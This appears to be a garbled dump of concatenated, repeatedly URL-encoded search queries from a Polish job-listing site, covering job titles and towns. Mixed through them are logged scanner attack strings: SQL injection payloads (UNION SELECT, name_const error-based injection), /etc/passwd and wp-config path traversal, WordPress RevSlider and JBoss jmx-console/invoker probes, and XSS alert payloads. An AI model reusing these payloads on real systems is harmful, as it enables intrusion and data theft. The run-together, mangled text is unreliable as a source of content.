warszawamonter+konstrukcji/wp-login.php%2527a%253d0/wp-admin/admin-ajax.php%253faction%253drevslider_show_image%2527a%253d0%2527%27a%3d0project+managertechnik%2belektryk%2b%252528m/k%252529 pomorskiemagazynowy %28m/k%29 lublinspecjalista ds szkole%25252525c5%2525252584kierowca w wypo%2525c5%2525bcyczalni samochodowej %252528m%2fk%252529 niemcyspecjalista%2bds.%2bkadr%2bi%2brekrutacji%2b%25252528m/k%25252529warehouse/wp-login.php%25252527a%2525253d0%25252527a%2525253d0location%2525253dtychy99999%25252522+union+select+unhex%25252528hezdalna+bez+języka+obcego polskapracownik dsmagazynier+%252c+pakowaczkierowca kat c union all select null%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull-- htseopiekunka+do+os%c3%b3b+starszych+w+niemczech+bez+j%c4%99zykaspecjalista ds.księgowychpracownik+produkcji+p%c5%82o%c5%84skdrwal pilarzkamień pomorskispecjalista ds. ksi%25c4%2599gowo%25c5%259bcispecjalista%2bw%2bdziale%2bmechanicznymm%252525c5%25252582odszy%2bkonsultant%2bds.%2brekrutacji%2b%25252528m/k%25252529kontrola+jako%252525252525c5%2525252525259bci polskakontrola+jako%252525c5%2525259bci opolebudownictwo%252b%25257c%252bgeodezjapracownik ochrony fizycznej z kwalifikacj%c4%85 mazowieckieredaktor treści marketingowychsprzedawca toruńforklift sosnowiecpraca+w+biurze+z+językiem+ukrainskim wrocławwojkowiceobsługa biurowasprzeda%2525c5%2525bc %25257c obs%2525c5%252582uga klienta/bran%2525c5%2525bca elektrotechniczn%2525c4%252585specjalista%2bds.%2bszkole%25252525c5%2525252584kierownik lubelskiez j%c4%99zykiem w%c5%82oskimoperator+maszyn śląskiekasjer wrocławpalmirykontroler+jako%2525252525c5%25252525259bcimagazynier%25252cprodukcja%25252ckierowca kat.b'a=0nowaopiekunka+do+osób+starszych+w+niemczech+bez+językawarehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy+and+1%253d1%2527a%253d0kierowca kat c union all select 14%2c14%2cconcat%28concat%28%27qqzpq%27%2c%27rudevmxtsj%27%29%2c%27qbbvq%27%29%2c14%2c14%2c14%2lektortechnolo konstrukcji mazowieckienieruchomości warszawamalarz+szpachlarz francjaadministracja biurowa gliwiceelektryk%252celektromonterustawiacz+form+wtryskowychprojektant/konstruktor/asystent+odzie%25c5%25bcywiskitkipraca%2bpomoc%2bksi%25252525c4%2525252599gowejpraca%2bbez%2bznajomo%25252525252525c5%252525252525259bci%2bj%25252525252525c4%2525252525252599zykain%2525c5%2525bcynier%252bserwisujunior+frontend warszawapomocnik śmieciarza niemcyasystent/ka ds. administracji i obs%25c5%2582ugi klienta ze znajomo%25c5%259bci%25c4%2585 j%25c4%2599zyka ruskietechnik+elektryk+%28m/k%29 warszawakierowca w%c3%b3zka wid%c5%82owegokierowca+%252528m%2fk%252529+%252528kat.+c%25252be%25252c+hakowce%252529 niemcydla obcokrajowc%c3%b3wручная работа Польшаdoradca technicznypracownik+produkcji+-+bezpłatny+dowóz+do+miejsca+pracy dolnośląskietechnik elektryk (m/k)kierownik+sprzedaży warszawapracownik+produkcji+%28m/k%29 bytomkierownik region%252525c3%252525b3wmagazynier%2525252cprodukcja%2525252ckierowca+kat.b%27a%3d0praca+fizyczna+sprz%c4%85taczkamonter pod%c5%82%c3%b3gkontrola+jako%c5%9bci sochaczewkasjer/kasprzeda%c5%bc %7c obs%c5%82uga klienta kielceobsługa+klientapyskowice1/2%2bemerytpniewyinternet %25257c e-commerce%2527a%253d0in%252525c5%252525bcynier elektrykbudownictwo wielkopolskieskrzypce+na+ślub łódzkiemonter+-spawacz niemcykierowca w wypo%2525c5%2525bcyczalni samochodowej %252528m/k%252529 wielkopolskiemonta%25c5%25bc instalacji elektrycznychmonter\ pakowaczpracownik+produkcji+-+nie+wymagamy+doświadczenia dolnośląskierecepcjonistka medycznamonter konstrukcji/wp-login.php%252527a%25253d0/07545460.php99999%252522 union select unhex%252528hex%252528version%252528%25252sprzataczka+w+szkole poznańconceptmarket warszawakierowca kat c union all select 14%252c14%252c14%252c14%252c14%252cconcat%2528concat%2528%2527qqzpq%2527%252c%2527jqfsnwtyee%25specjalista%2bprpraca%2bfizyczna%2bsprz%2525c4%252585taczka katowicekontrola%2bjako%25c3%2585%25c2%259bcikierowca kat b c warszawaanalityk chemiczny mazowieckiemechanik utrzymania ruchupracownik ksi%25c4%2599gowo%25c5%259bcipraca%2bz%2borzeczeniem%2bo%2bniepe%c5%82nosprawno%c5%9bci%2bkierowca%2bkat.bopiekunka do os%c3%b3b starszych w niemczech bez j%c4%99zykadodatkowado kioskupracownik+produkcji+-+praca+dla+kobiet+i+m%c4%99%c5%bcczyznkierowca+w+wypo%25252525c5%25252525bcyczalni+samochodowej+%2525252528m/k%2525252529kontroler jako%2525c5%25259bci sosnowiecpracownik produkcji obornikilogistyka%2b%7c%2bdystrybucja polandkierownik windykacji warszawa/etc/passwd%25%27%2bunion%2ball%2bselect%2bnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull--%2bhzvckierowca+kat+d+malopolskie krakówdoradca ds nieruchomo%25c5%259bcipracownik+magazynu niemcytokarz wrocławrejestratorka+medycznakierowca kat c union all select 14%25252c14%25252c14%25252c14%25252c14%25252c14%25252cconcat%252528concat%252528%252527qqzpq%25ksi%c4%99gowo%c5%9b%c4%87+%7c+audyt+%7c+podatki pomorskiein%25252525c5%25252525bcynier elektronik %2525252528m%252fk%2525252529kadry+i+płacebez%2bj%25c4%2599zyka niemcymagazynier+-+nie+wymagamy+doświadczeniatechnik elektryk (m/k) francjakierownik+sprzeda%c5%bcy warszawapr manager warszawaprodukcja dla niepełnosprawnych%' union all select null,null#t%252525c5%25252582umacz j%252525c4%25252599zyka migowegospawacz+136handlowiec poznańkierowca c%2be lub c1praca%252525252b%252525252bfizyczna%252525252bbez%252525252bj%252525252525c4%25252525252599zykapracownik magazynu bez doświadczenia łódzkietechnik%252belektryk%252b%2528m/k%2529praca biurowa oławarozne+stanowiskaspecjalista+ds.+ksi%c4%99gowo%c5%9bcipraca%252525252bfizyczna%252525252bspawacz niemcymonter+konstrukcji%252fwp-login.php%2527a%253d0%252f07545460.php+and+1%253d1%2527a%253d0chełmekkiirowca kat b magazynier Łódźsprzeda%252525c5%252525bc %2525257c obs%252525c5%25252582uga klienta lublininternet %25257c e-commercedoradca%2btechnicznywsparcie%2bsprzeda%c5%bcydębogórzepracownik myjni samochodowej (m/k)skrzypce na %25252525c5%252525259blubpraca biurowa katowicespecjalista d/s importu -eksportu %25252525252c obs%2525252525c5%252525252582uga klienta %25252525252c ar %25252525252c konsultapracownik obszaru produkcji %25252525252528m/k%25252525252529specjalista+ds+kar+i+p%25252525c5%2525252582acin%2525c5%2525bcynier gdyniaŚwieciekupiec+%2528m/k%2529etat warszawareferent+ds+funduszy+europejskichkonsultant telefoniczny ds. sprzeda%252525252525c5%252525252525bcy produkt%252525252525c3%252525252525b3w bankowychspedytor mi%2525252525c4%252525252599dzynarodowytransport %25257c spedycjatechnolog %2525c5%2525bcywnosci mazowieckieart+directorspecjalista+ds+kar+i+p%c5%82ac%27a%3d0%27a%3d0factory+work polandrolnictwo %7c ochrona %c5%9brodowiskapracownik+monta%2525c5%2525bcu+%252528m/k%252529 katowicekierowca+w+wypo%2525252525c5%2525252525bcyczalni+samochodowej+%252525252528m%252fk%252525252529praca+fizyczna szczecinit sta%252525c5%252525bcspecjalista%2bds%2bkadr%2bi%2bp%25c5%2582acprzedsi%c4%99biorstwo nasienne centrala nasienna sp. z o.ospecjalista d/s importu -eksportu %25252c obs%2525c5%252582uga klienta %25252c ar %25252c konsultant z j%2525c4%252599zykiem framonter konstrukcji gdańskpracownik%2bprodukcji%2b-%2bnie%2bwymagamy%2bdo%25c5%259bwiadczeniakierownik zespo%2525c5%252582u programistycznegobudownictwo%252525252b%252525257c%252525252bgeodezja francjacomputer+teacher'a=0ochrona+fizycznapracownik powierzchni sprzeda%c5%bcy/kasjermonter%25255c+pakowaczpraca%2bpomoc%2bksi%2525c4%252599gowej wielkopolskiestudent work krakówkierowca+w+wypo%c5%bcyczalni+samoengineerpraktyki+%7c+sta%c5%bcaaaaaaaasales managermechanik monter francjabieruńwsparcie+sprzeda%c5%bcymagazynier %2528m/k%2529przemys%c5%82+%7c+produkcja podkarpackiepracownik%2bporz%2525252525c4%252525252585dkowyspecjalista ds kadr i p%2525c5%252582ac podkarpackiekierowca kat c' union all select null,null,null,null,null,null,null,null,null,null-- tvlbpiastówasystent%20dzia%c5%82u%20hrpracownik+dzia%c5%82u+administracjispecjalista%2bds%2bkar%2bi%2bp%252525c5%25252582actechnolo+konstrukcji/enterso.info/wp-login.php%2527specjalista ds. logistyki warszawajaktorówciesla zbrojarzpraca%252525252bbez%252525252bznajomo%2525252525252525252525c5%25252525252525252525259bci%252525252bj%2525252525252525252525c4%2 niemcypracownik montażu (m/k) siemianowice śląskiej%25252525c4%2525252599zyk rosyjskikierowca w wypo%c5%bcyczalni samochodowej %28m/k%29 katowiceoperator%2bw%25252525c3%25252525b3zka%2bwid%25252525c5%2525252582owego%2b%2525252528m/k%2525252529specjalista+ds.+p%2525c5%252582ac+i+kadrwarehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy+or+%25281%252c2%2529%253d%2528select%252afrom%2528select+name_cwarehouse+worker/wp-login.php'a=0transport %25257c spedycja%252522 and %252522x%252522%25253d%252522y%252527a%25253d0wyk%252525c5%25252582adanie towarukierownik śląskiepracownik%252bprodukcji%252b%2525252528m%252fk%2525252529przemysł+|+produkcja gliwicespecjalista ds ubezpiecze%25c5%2584 warszawakraków/etc/passwd%2525%2527+order+by+1--+lxhm''a=0naruszewokierownik produkcji śląskiepracownik+powierzchni+sprzeda%2525c5%2525bcy/kasjer warszawapomoc biurowa krakówpracownik+powierzchni+sprzeda%25c5%25bc%25c4%2585ksi%25c4%2599gowo%25c5%259b%25c4%2587+%257c+audyt+%257c+podatki warszawanauczyciel+angielskiego,+chinskogojunior front end developermechanicy pojazd%2525c3%2525b3w ci%2525c4%252599%2525c5%2525bcarowychkierowca w wypo%25c5%25bcyczalni samochodowej %2528m%252fk%2529 niemcymagazynier%252525252cprodukcja%252525252ckierowca%2bkat.bspecjalista ds. szkole%252525c5%25252584pracownik do sortowania owoc%c3%b3w holandiaelektryk%252b%2528m/k%2529j%25252525c4%2525252599zyk%2bfrancuskimarketing+%257c+reklama+%257c+prpodwykonawca p%25c5%2582ytky g%25c5%2582adzie malowaniekierownik region%2525c3%2525b3wprzemysł+|+produkcja zachodniopomorskieinżynier+serwisumonter+rusztowańmchanical engineeroperator maszyn produkcyjnych niemcykierowca%25252bkat%25252bbpomoc%2bw%2bprzedszkoluwykładanie+towaru+dniówkain%25252525c5%25252525bcynieria%252b%252525257c%252bprojektowaniekontrola+jako%2525252525252525c5%25252525252525259bcitransport+%257c+spedycja%2522+and+%2522x%2522%253d%2522yśląskiespecjalista+ds.+wdro%25252525c5%25252525bce%25252525c5%2525252584ta%c5%9bma produkcjaprodukcja%2bdla%2b%2bniepe%252525c5%25252582nosprawnych%25252527a%2525253d0pracownik%2bmonta%25252525c5%25252525bcu%2b%2525252528m/k%2525252529transport+%7c+spedycja'+and+'x'='yopiekunka osób starszych gdańskkątyoperator+w%252525c3%252525b3zka+wid%252525c5%25252582owego holandiapracownik%2badministracyjnapracownik%25252bsekretariatubudownictwo%252b%257c%252bgeodezjamonter+instalacji+grzewczych+i+sanitarnychpracownik%2bbudowlanki niemcypraca zdalna wrocławbrygadzista produkcyjnypraca+pomoc+ksi%25c4%2599gowejkierowca niemcykierowca w wypo%252525252525c5%252525252525bcyczalni samochodowej %25252525252528m/k%25252525252529m%25c5%2582odszy+konsultant+sprzeda%25c5%25bcytransport%2b%7c%2bspedycja zachodniopomorskieprodukcja indesit - bezp%25c5%2582atny transport- atrakcyjne premiemagazynier choroszczin%2525252525c5%2525252525bcynieria%25252b%25252525257c%25252bprojektowanie podkarpackiespecjalista+ds.+administracji+%252528m/k%252529przedstawiciel+handlowy pomorskiepracownik+produkcji piotrków+trybunalskiochrona osób i mienia starachowicemonter konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3d0 and 1%3d1%27kierowca transport mleka niemcywprowadzanie danych poznańlogistyka+%25257c+dystrybucja polandtester warszawaphoto+editorhandlowiec it warszawap%c5%82atnos+ci warszawapracownik+inwentaryzacji śląskiekonsultant telefoniczny ds. sprzeda%25c5%25bcy produkt%25c3%25b3w bankowych-3921' union all select 13,concat(0x7170627871,0x456b774a426c4e7a534d434a4c71634671524364715571694d4f5663636350697a544867494d596lektor+angielskiego śląskiesuwałkidoradca+ds+nieruchomo%25c5%259bci warszawamonter konstrukcji/wp-login.php%252527a%25253d0/wp-admin/wp-admin/admin-ajax.php%25253faction%25253drevslider show image and 1=1monter+podłógmaszynistapracownik do wyk%25252525c5%2525252582adania towaruspecjalista+ds.+obsługi+klientakierowca w wypo%25252525c5%25252525bcyczalni samochodowej %2525252528m%252fk%2525252529produkcja+dla++niepełnosprawnych+union+all+select+null,null--+inxapracownik produkcji – nie wymagamy doświadczeniadoradca%25252bklientads.%25252bszycia%25252bna%25252bmiar%25252525c4%2525252599projet+manageroperator%25252bw%252525c3%252525b3zkakamieniec+ząbkowickipalczapracownik biurowy 1/2 etatu katowiceoperator w%25c3%25b3zk%25c3%25b3w wid%25c5%2582owych polskaasystent+inżynierapracownik+administracyjny poznańpraca+zakwterowaniem polskaspecjalista bhp warszawapraca pomoc warszawakonstruktorcie%25252525c5%252525259bla szalunkowysprzeda%25c5%25bc %257c obs%25c5%2582uga klienta lublinkierowca b bes znajosci jenzyka niemcyprace%2bmanualnekierownik gospodarstnauczyciel język niemiecki/login.actionmonter+konstrukcji/wp-login.php%2527a%253d0/wp-content/plugins/revslider/temp/update_extract/monter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0 and 1=1kierowca kat c union all select null%2cnull-- gotnpracownik powierzchni sprzedaży tomaszów mazowieckipraca+fizyczna holandiajanikowodzia%25c5%2582 obs%25c5%2582ugi klientatechnik krakówlogistyka %257c dystrybucja holandiain%25c5%25bcynier+jako%25c5%259bci+w+dziale+projekt%25c3%25b3wmagazynienauczyciel j%c4%99zyka nemieckiegopraca fizyczna bez j%252525252525252525c4%25252525252525252599zyka niemcypomoc+kuchenna pomorskiepraca%25252bburowaślusarz bez jezyka niemcya%25252526jmagazynier%2b%28m/k%29przemysł | produkcja kielcein%25c5%25bcynier+budowy pomorskieasystent/ka%252bds.%252badministracji%252bi%252bobs%25252525c5%2525252582ugi%252bklienta%252bze%252bznajomo%25252525c5%252525259sta%2525c5%2525bc hrmonter konstrukcji/wp-login.php%25252525252527a%2525252525253d0/07545460.php%25252525252527 and %25252525252527x%25252525252527%produkcja indesit - bezpłatny transport- atrakcyjne premiepraca+fizyczna+sprzątaczka będzinpracownik%252bdzia%25252525c5%2525252582u%252bobs%25252525c5%2525252582ugi%252bklientapracownik szklarni z ogórkamipracownik biurowy gliwicein%252525c5%252525bcynier+elektrykkierownik serwisukierowca%2525252bb%2525252bbes%2525252bznajosci%2525252bjenzyka niemcykierowca (m/k) (kat. c+e, hakowce)warehouse/wp-login.php%2527a%253d0%2527a%253d0kierowca kat c union all select 14%252cconcat%2528concat%2528%2527qqzpq%2527%252c%2527guotrpdkjnquteorboujxqudymlmzftutpbsxqau%finanse %257c bankowo%25c5%259b%25c4%2587 warszawapracownik%2bsklepu%2bodzie%c5%bcowego%2b%28m/k%29administracja państwowa śląskiepracownik+magazynowy łódzkieprzemys%2525c5%252582+%25257c+produkcja pomorskieprodukcja tychybadania i rozw%2525c3%2525b3j szczecintechnik elektryk %25252525252528m/k%25252525252529kierowca %25252528m%25252fk%25252529 %25252528kat. c%2525252be%2525252c hakowce%25252529 niemcysekretarka ze znajomością j. niemieckiegolektor j. niemieckiegokierowca kat c%2527 union all select null%252cnull%252cnull%252cnull-- qpccplanista produkcji łódzkiem%25c5%2582odszy analitykpracownik monta%25c5%25bcumonter%2fka element%25c3%25b3w do siedze%25c5%2584 samochodowychmonter+konstrukcji/wp-login.php%252527a%25253d0/wp-admin/wp-admin/admin-ajax.php%25253faction%25253drevslider+show+imagemonter+rurociagow'a=0 niemcytłumacz+rosyjskiegopracownik%252bbudowlankispecjalista%2bds.%2badministracjiobs%25c5%2582uga+maszynadministracja śląskiepracownik%252bprodukcji%252b%2528m/k%2529 niemcypraca%2bemerytpracownik%2bfturystyka | hotelarstwotczewin%2525c5%2525bcynierwarehouse/wp-login.php%27a%3d0%27a%3d0location%3dtychy+or+%281%2c2%29%3d%28select%2afrom%28select+name_const%28char%28111%2c108%jawornikpraca++fizyczna+bez+j%2525252525c4%252525252599zyka niemcypracownik+magazynowy gorzów+wielkopolskiosoba%2bsprz%c4%85taj%c4%85capracownik montażu sosnowieclektor języka angielskiego kraków../../../../../../../etc/passwdkierowca w wypożyczalni samochodówmonter konstrukcji/wp-login.php%2527a%253d0/07545460.php and 1%253d1kierowca++kat+c+union+all+select+null,null,null,null,null,null,null,null--+lmmvtechnik elektryk %2525252528m/k%2525252529 polskapracownik+do+wyk%2525c5%252582adania+towaru/etc/passwd%25%27 order by 1-- lxhmpracownik produkcji żarówdrug-resistance+testing+|+laboratory+testing+|+adult+and+adolescent+arv+|+aidsinfotechnolo+konstrukcji/enterso.info/wp-login.phppracownik monitoringu - obiekt handlowy - gliwicepraca%25252b%25252bfizyczna%25252bbez%25252bj%2525252525c4%252525252599zyka niemcynowe miasto lubawskiemedia+%7c+sztuka+%7c+rozrywkapraca%25252bfizyczadministracjia%25252bbiurowanaoperator+wózka+widłowego+hamburgmagazynier+z+uprawieniami+na+wózki+widłowepraca%2bpomoc%2bksi%2525252525c4%252525252599gowepraca%25252bbez%25252bznajomo%25252525252525c5%252525252525259bci%25252bj%25252525252525c4%2525252525252599zykaprzemysł | produkcja gnieznomonter+konstrukcji/wp-login.php'a=0/07545460.php"+and+"x"="y'a=0kierowca mi%25c4%2599dzynarodowyoperator+rotofleksunowa dębahr,+kadry mazowieckieoperator w%25c3%25b3zka wid%25c5%2582owego hamburg30inżynier+elektronikmechanik+przemys%c5%82owyasystent klienta%25252c konsultant warszawanowa wieś lęborskapomocnik %25c5%259bmieciarzasekretarka+ze+znajomo%252525c5%2525259bci%252525c4%25252585+j.+francuskiego%252525252525c5%2525252525259blusarz bez jezykakomornikienergetyka+%7c+elektronika warszawapraca++fizyczna+bez+językam%25c5%2582odszy in%25c5%25bcyniernauczyciel j%c4%99zyk niemiecki/login.action/web-console/invoker/admin-console//github.com/joaomatosf/jexbossin%2525c5%2525bcynier budowy/wp-login.php or %281%2c2%29%3d%28select%2afrom%28select name_const%28char%28111%2c108%2c111%2c108%2produkcja dla niepełnosprawnych' union all select concat(0x7170627871,0x6e534e79686f496f4b48,0x717a786a71),13,13#malarz%252bbudowlanypomoc%2bkuchenna%2c%2basystentki%2c%2bcukirnikadministracja+pa%25c5%2584stwow warszawakierowca++kat+c%'+union+all+select+null,null,null,null,null,null,null--+kcgwwarehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy%2bor%2b%25281%252c2%2529%253d%2528select%252afrom%2528select%2bnauczyciel język niemiecki/login.action/web-console/invoker/admin-console/github.com/joaomatosf/jexbosspraca+dla+osob+niepelnosprawnychtechnolog+żywnościpracownik%2bprodukcji%2bp%25c5%2582o%25c5%2584skpomoc%2bksiegowej gryfinopracownik do sortowania owoc%252525252525252525c3%252525252525252525b3wkontrola+jakości krakówkontrola%25252bjako%2525252525c5%25252525259bcipracownik+magazynu+bez+do%c5%9bwiadczeniaasystent/kaliczenie+towaru warszawaprzemys%2525c5%252582+%25257c+produkcja+krojczydoradca+techniczny+(komponenty+maszyn) podkarpackieblacharz samochodowy niemcymonter%2bkonstrukcji/wp-login.php%27a%3d0/07545460.php99999%22%2bunion%2bselect%2bunhex%28hex%28version%28%29%29%29%2b--%2b%22x%specjalista%2bds.%2bksi%25c4%2599gowo%25c5%259bcipracownik+montażu+(m/k) dąbrowa+górniczaspecjalista ds szkole%2525c5%252584kontraktobs%252525c5%25252582uga klientaprodukcja+dla++niepełnosprawnych+union+all+select+null,null,null,null,null,null,null,null#dyrektor zak%2525c5%252582adubudownictwo%2b%25252525257c%2bgeodezja francjakrośniewiceasystent ds. ksi%c4%99gowoscipomocnik %25c5%259bmieciarza polskakonsultant ds. obs%25252525c5%2525252582ugi klientakierowca+w+wypo%2525c5%2525bcyczalni+samochodowej+%252528m%252fk%252529 niemcywózki+widłowesprzeda%c5%bc %7c obs%c5%82uga klienta tychyadministracja personalna warszawaj%2525c4%252599zyk%2bw%2525c5%252582oskiuk%c5%82adanie towarupraca bez znajomo%2525252525252525c5%25252525252525259bci j%2525252525252525c4%252525252525252599zyka niemcyrolnictwo+|+ochrona+środowiska dolnośląskiemonter+konstrukcji/xmlrpc.php%2527a%253d0olsztyn'specjalista ds kadr i p%25c5%2582acaustriapraca magazynieroperator w%c3%b3zka wid%c5%82owegotechnik+elektryk/wp-login.php%27a%3d0in%252525c5%252525bcynieria%252b%2525257c%252bprojektowanieprzemys%c5%82 %7c produkcja katowicespecjalista%2bds.%2bjako%25252525c5%252525259bciadministracja+państwowapracownik powierzchni sprzeda%25c5%25bcy/kasjer warszawapracownik%2bpowierzchni%2bsprzeda%252525c5%252525bcymechanicypracownik+powierzchni+sprzeda%c5%bcyjunior front end developer gdyniapracownik produkcji - bezp%25c5%2582atny dow%25c3%25b3z do miejsca pracy%2521turekpraca%2bpomoc%2bksi%25252525c4%2525252599gowej wielkopolskiekierownik rob%c3%b3t%25252525c5%252525259blusarz bez jezyka niemcykierowca%25252bw%25252bwypo%2525252525c5%2525252525bcyczalni%25252bsamochodowej%25252b%252525252528m%252fk%252525252529 niemcytechnik+elektryk+(m/k) pomorskieskoroszycestarszy+inspektor+bhpwarehouse/wp-login.php%252527a%25253d0%252527a%25253d0location%25253dtychy2121121121212.1praca++fizyczna+bez+j%25252525252525c4%2525252525252599zyka niemcyasystent krakówpraca+fizyczna+sprz%c4%85taczka bytomspecjalista%2bds.%2bplanowania%2bjako%c5%9bci%2b%28m/k%29bez+j%25c4%2599zyka niemcymonter+konstrukcji/wp-login.php%27a%3d0/894613256498.phpcustomer service specialist with turkishpracownik monta%2525c5%2525bcu bytomtweets with replies by eduardo antonio pasten herrera (@pasten_herrera) | twitterpracownik%2525252bsekretariatumonter+konstrukcji/wp.../wp-admin/admin-ajax.php%253faction%253drevslider_show_imageinternships projectpodlasiein%2525c5%2525bcynier elektronik %252528m/k%252529 lublinmechanik przemys%252525c5%25252582owypomoc+w+t%252525c5%25252582umaczeniachprzemys%2525c5%252582 %25257c produkcja pomorskiepraca%2525252bzakwterowaniem polskastażw biurze stowarzyszenie, fundacja, organizacjehuman resources %257c kadry warszawatransport%2b%2525257c%2bspedycja2121121121212.1m%252525c5%25252582odszy+ksi%252525c4%25252599gowycie%c5%9blamanager+%2525c5%252582a%2525c5%252584cucha+dostawpracownik%2bszklarnidla nieletnich dzierżoniówspecjalista ds. obs%252525c5%25252582ugi klienta-j. niemieckipakowacz dolnośląskiegorzów/etc/passwd%25%27+union+all+select+null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull--+qhytnauczyciel język niemiecki/login.action/admin-console/specjalista ds. zakup%25252525c3%25252525b3wspecjalista%2bbhppracownik monta%25c5%25bcu bytompraca w niemczechpraca fizyczna szwajcariakierowca%20w%20wypo%c5%bcyczalni%20samochodowej%20(m/k)export managerpraca na produkcjidoradca klienta poznańmonter konstrukcji/wp-login.php%27a%3d0/07545460.php%27 and %27x%27%3d%27xnauczyciel j%2525c4%252599zyk niemiecki/login.action/jmx-console/admin-console/login.seamenergetyka %2525257c elektronikapracownik montażupraca dla moll/etc/passwd%'+union+all+select+null,null,null,null,null,null--+fmbvkierowca kat c%25%27 order by 1-- rvrimonter+laminatukontrola%2bjako%25252525c5%252525259bci mazowieckienauczyciel+angielskiego%252c+chinskogowykładowca+angielskiego śląskiein%25c5%25bcynier budowy/wp-login.php" or (1,2)=(select*from(select name_const(char(111,108,111,108,111,115,104,101,114),1),nameДублин (традиционное графство)praca%2525252bbez%2525252bznajomo%2525252525252525c5%25252525252525259bci%2525252bj%2525252525252525c4%252525252525252599zykaprojektowanie graficzmne śląskiepracownik+magazynowy+-+18,29+zł+brutto/godz.+plus+premiemagazynier+(m/k) warszawaphotographyinmotowarehouse/wp-login.php'a=0'a=0location=tychy99999"+union+select+unhex(hex(version()))+--+"x"="xaluglasskontrola+jakości polskapraca+fizyczna+sprzątaczka małopolskiesprzataczka w szkole%27 and %27x%27%3d%27ypraca fizyczna koszalinprzedstawiciel handlowy podkarpackiemechanik przemysłowy/ monterpracownik budowlanki niemcykontrola%252525252525252bjako%2525252525252525252525c5%25252525252525252525259bcipomoc+księgowamagazynier%2bopolepracownik w gospodarstwie rolnympracownik łódzkiejako%2525252525c5%25252525259b%2525252525c4%252525252587sprzątaczka w szkole szczecinpracownik ochrony policepracownik%25252bbiurowynauczyciel j%c4%99zyk niemiecki mazowieckiepracownik+biurowy+na+magazyndoradztwo+%7c+konsultingmonter%2fka element%c3%b3w do siedze%c5%84 samochodowych%7c opieka zdrowotnadyrektor przedszkolamistrz+produkcjim%2525c5%252582odszy konsultant sprzeda%2525c5%2525bcy m/kin%25c5%25bcynier serwisu mazowieckieprodukcja lublinpraca+fizyczna wałbrzychpracownik%2bczyszczenia%2bcz%c4%99%c5%9bci%2bmaszynatrakcyjne+premiec#'a=0sprzataczka+w+szkole dąbrowa+górniczapraca%2525252525252bz%2525252525252bzakwaterowaniem polskasprzedawca%2c niania%2c operatorka linii produkcyjnejkierownik+region%2525c3%2525b3wenergetyka %7c elektronikawarehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy99999%2522+union+select+unhex%2528hex%2528version%2528%2529%2529bhp łódzkiekontrola jakości częstochowabudownictwo+%2525257c+geodezja+pomocnikpracownik do sortowania owoc%25c3%25b3wmechanik%2bprzemys%2525c5%252582owy/%2bmonter niemcypraca fizyczna skawinapracownik produkcyjny %25252528m/k%25252529 gliwicespecjalista ds kadr i p%252525c5%25252582ac podkarpackiebiuro administracja ksi%2525c4%252599gowo%2525c5%25259b%2525c4%252587 j%2525c4%252599zyki warszawamonter+konstrukcji/wp-login.php%253cimgonmouseover%253d%2522alert%2528%2527mysqlerror%2527%2529%2522%253emonter%2fka+element%c3%b3w+do+siedze%c5%84+samochodowych niemcyserwis+%257c+technika+%257c+monta%25c5%25bcbudownictwo%2b%2525257c%2bgeodezja%2bpomocnikhydraulik%2fmonter instalacji francjamonter+konstrukcji/wp-login.php%252527a%25253d0/wp-content/plugins/revslider/temp/update_extract/wp-admin/admin-ajax.php%25253faobs%2525c5%252582uga+klienta warszawapracownik+oohrony warszawasławkówprodukcja%2blek%25252525c3%25252525b3wmagazynier- praca na w%252525c3%252525b3zku wid%252525c5%25252582owymdoradca handlowypraca%252bbiurowa%252bz%252bobs%25252525c5%2525252582ug%25252525c4%2525252585%252bklientajunior front-endinternet %257c e-commerce%27a%3d0 szczecinkierowca++kat+c+union+all+select+14%2cconcat%28concat%28%27qqzpq%27%2c%27oqozvylpos%27%29%2c%27qbbvq%27%29%2c14%2c14%2c14%2c14%2nauczyciel j%25c4%2599zyk niemiecki/login.action/web-console/invoker/invoker/jmxinvokerservletprzemys%c5%82 %7c produkcja szczecinkierowca b kujawsko-pomorskiekierowca kat c union all select concat%28concat%28%27qqzpq%27%2c%27dlgzawmngd%27%29%2c%27qbbvq%27%29%2c14%2c14%2c14%2c14%2c14%2operator%2bw%25c3%25b3zka%2bwid%25c5%2582owego mazowieckiewarehouse/wp-login.php%2527a%253d0%2527a%253d0%22 and %22x%22%3d%22yspecjalista%2bds.%2bsprzeda%25252525c5%25252525bcy%2bprodukt%25252525c3%25252525b3w%2bbankowychpraca w biurze koninlider+w+dziale+art.+przemysłowych zgorzelecmedycyna | lekarz dentistaspecjalista+ds+hrpraca+fizyczadministracjia+biurowana warszawaoperator w%c3%b3zka wid%c5%82owego niemcymedycyna+%257c+opieka+zdrowotnapraca zdalna z domu  małopolskiekierowca c+e wywrotkaślusarz spawacz holandiafinanse%2b%2525257c%2bbankowo%252525c5%2525259b%252525c4%25252587administracja%2bpa%252525c5%25252584stwowahuman resources %257c kadrysta%2525c5%2525bc marketingprzemys%c5%82+%7c+produkcja lublinmonter konstrukcji/wp-login.php%3cbodyonload%3dalert%28%27mysqlerror%27%29%3e1 з 154 ,szuka pracy kierowcy c+e pdwójna obsadatrzebnicaadministracja+personalnaadministracja+biurowa warszawa,w%2bbiurze%2bstowarzyszenie%2c%2bfundacja%2c%2borganizacjeoperator+w%2525252525c3%2525252525b3zk%2525252525c3%2525252525b3w+wid%2525252525c5%252525252582owychkontrola%2bjako%252525252525252525c5%2525252525252525259bci polskaprodukcja Świdnicakluczbork/lekarz stomatologspecjalista+w+dziale+zaopatrzenia lubuskieksi%25c4%2599gowo%25c5%259b%25c4%2587 %257c audyt %257c podatki warszawamechanik+monter francjaczarnocinszwecjaspecjalista ds kar i p%252525c5%25252582acpraca%2525252bzdalnamonter konstrukcji/wp-login.php%27a%3d0/07545460.php/wp-content/themes/nishizawa_tmp/force-download.php%3ffile%3d../../../wp-conrencistki+pracakey+account+manager+%2525252528m/k%2525252529praca bez znajomo%c5%9bci j%c4%99zykaopiekunka do os%2525c3%2525b3b starszych w niemczech bez j%2525c4%252599zyka niemcyadministracja biurowa 